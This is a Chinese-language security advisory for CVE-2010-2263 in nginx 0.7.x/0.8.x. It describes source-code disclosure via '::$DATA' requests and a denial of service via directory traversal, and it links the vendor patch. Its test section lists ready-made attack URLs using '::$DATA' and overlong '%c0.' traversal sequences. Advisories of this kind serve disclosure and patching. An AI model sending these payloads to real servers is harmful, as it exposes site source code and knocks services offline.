Nginx HTTP请求源码泄露和拒绝服务漏洞


发布日期:2010-06-11
更新日期:2010-06-13

受影响系统:
Igor Sysoev nginx 0.8.x
Igor Sysoev nginx 0.7.x
不受影响系统:
Igor Sysoev nginx 0.8.40
Igor Sysoev nginx 0.7.66
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 40760
CVE ID: CVE-2010-2263

nginx是多平台的HTTP服务器和邮件代理服务器。

nginx服务器无法处理交换数据流(ADS),将其处理为普通文件的数据量。攻击者可以使用filename::$data的形式读取并下载Web应用文件的源码;此外如果在HTTP请求中添加了目录遍历序列的话,就可以覆盖内存寄存器,导致拒绝服务。

<*来源:Dr_IDE
        Jose Antonio Vazquez Gonzalez
 
  链接:http://www.exploit-db.com/exploits/13822/
        http://www.exploit-db.com/exploits/13818/
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/index.html::$DATA
http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%20
http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%20
http://www.example.com/%c0.%c0./%c0.%c0./%20

建议:
--------------------------------------------------------------------------------
厂商补丁:

Igor Sysoev
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://nginx.org/download/nginx-0.8.40.zip

相关内容